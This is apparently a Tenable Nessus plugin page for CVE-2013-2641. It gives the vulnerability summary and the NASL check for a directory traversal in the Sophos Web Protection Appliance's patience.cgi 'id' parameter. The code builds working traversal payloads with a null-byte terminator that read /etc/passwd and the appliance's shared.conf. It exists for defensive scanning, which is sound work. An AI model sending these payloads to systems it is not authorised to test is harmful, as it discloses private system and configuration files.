Sophos Web Protection Appliance patience.cgi 'id' Parameter Directory Traversal


CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

EPSS

0.921

Percentile

98.9%

The Sophos Web Protection application running on the remote host is affected by a directory traversal vulnerability in the patience.cgi script due to improper sanitization of user-supplied input passed to the ‘id’ parameter. An unauthenticated, remote attacker can exploit this to retrieve arbitrary files from the remote host subject to the privileges of the user running the web server.

Note that the application is reportedly affected by additional vulnerabilities; however, this plugin has not tested for them.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  # Plugin metadata. This section runs only in "description" mode; the
  # actual check starts after the closing brace.
  script_id(65874);
  script_version("1.16");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2013-2641");
  script_bugtraq_id(58833);
  script_xref(name:"EDB-ID", value:"24932");

  script_name(english:"Sophos Web Protection Appliance patience.cgi 'id' Parameter Directory Traversal");
  script_summary(english:"Attempts to read a file.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is running a web application that is affected by a
directory traversal vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Sophos Web Protection application running on the remote host is
affected by a directory traversal vulnerability in the patience.cgi
script due to improper sanitization of user-supplied input passed to
the 'id' parameter. An unauthenticated, remote attacker can exploit
this to retrieve arbitrary files from the remote host subject to the
privileges of the user running the web server.

Note that the application is reportedly affected by additional
vulnerabilities; however, this plugin has not tested for them.");
  # https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?4aac7176");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Sophos Web Protection Appliance version 3.7.8.2 or later.");
  # Unauthenticated, network-reachable, read-only impact (C:P/I:N/A:N).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  # NOTE(review): the D2 Elliot module is named for an RCE, but this plugin
  # only exercises the traversal read; the RCE is one of the "additional
  # vulnerabilities" mentioned above that it does not test.
  script_set_attribute(attribute:"d2_elliot_name", value:"Sophos Web Protection Appliance 3.7.8.1 RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  # As recorded here the fix (04/01) predates the public advisory (04/03).
  script_set_attribute(attribute:"vuln_publication_date", value:"2013/04/03");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/04/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/04/09");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:sophos:web_appliance");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/a:sophos:sophos_web_protection");
  script_end_attributes();

  # ACT_ATTACK: this plugin sends an actual traversal payload, not just a
  # version probe, so it is skipped in "safe checks" scans.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Runs only where the detection plugin already recorded an install.
  script_dependencies("sophos_web_protection_detect.nasl");
  script_require_keys("installed_sw/sophos_web_protection");
  script_require_ports("Services/www", 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

appname = 'Sophos Web Protection';

# Stop unless the detection plugin recorded an install, then locate it.
get_install_count(app_name:'sophos_web_protection', exit_if_zero:TRUE);
port = get_http_port(default:443);
install = get_single_install(app_name:'sophos_web_protection', port:port);

cgi_path = strcat(install['dir'], '/cgi-bin/patience.cgi');

# Probe order matters: the first file whose signature matches is the one
# reported, and the loop stops there.
probe_order = make_list('/etc/passwd', 'shared.conf');

# Value sent in 'id' for each probe. The trailing %00 truncates whatever the
# CGI appends after the user-controlled part of the path.
traversal = make_array();
traversal['/etc/passwd'] = strcat(mult_str(str:'../', nb:12), '/etc/passwd', '%00');
traversal['shared.conf'] = strcat(mult_str(str:'../', nb:2), '/persist/config/', 'shared.conf', '%00');

# Regex that proves the response really is the requested file.
signature = make_array();
signature['/etc/passwd'] = "root:.*:0:[01]:";
signature['shared.conf'] = '# Generated by Sophox postinstall\\.';   # nb: "Sophox" (not "Sophos") is what the appliance writes

# Consumed by the reporting section below.
contents = '';
vuln_req = '';
found_file = '';
foreach target (probe_order)
{
  attempt = strcat(cgi_path, '?id=', traversal[target]);

  # exit_on_fail: an unanswered request aborts the plugin instead of
  # falling through to the next probe.
  res = http_send_recv3(method:"GET", item:attempt, port:port, exit_on_fail:TRUE);
  body = res[2];

  if (!egrep(pattern:signature[target], string:body)) continue;

  found_file = target;
  vuln_req = attempt;
  contents = body;
  break;
}

if (strlen(vuln_req) == 0) audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:install['dir']));

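if (report_verbosity > 0)
{
  line_limit = 10;
  snip = crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30);
  trailer = '';

  # Both probes are the same traversal read; only the file differs. The
  # shared.conf wording previously described an "included script", which is
  # inaccurate - it is the appliance's own configuration file.
  if ('shared.conf' >< found_file)
  {
    header =
      'Nessus verified the issue by reading the application\'s own\n' +
      '\'' + found_file + '\' configuration file and verifying its contents in\n' +
      'the response using the following URL';
  }
  else
  {
    header =
      'Nessus was able to exploit the issue to retrieve the contents of\n' +
      '\'' + found_file + '\' on the remote host using the following URL';
  }

  # Excerpt only at verbosity > 1, and only the first line_limit lines.
  if (report_verbosity > 1)
  {
    # NOTE(review): judging from its name, redact_etc_passwd masks passwd-
    # style entries only; for a shared.conf hit the excerpt is presumably
    # emitted as-is, so keep line_limit small - the config may hold secrets.
    contents = data_protection::redact_etc_passwd(output:contents);
    trailer =
      'Here are its contents (limited to ' + line_limit + ' lines) :\n' +
      '\n' +
      snip + '\n' +
      beginning_of_response(resp:contents, max_lines:line_limit) +
      snip;
  }

  report = get_vuln_report(items:vuln_req, port:port, header:header, trailer:trailer);
  security_warning(port:port, extra:report);
}
else security_warning(port);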
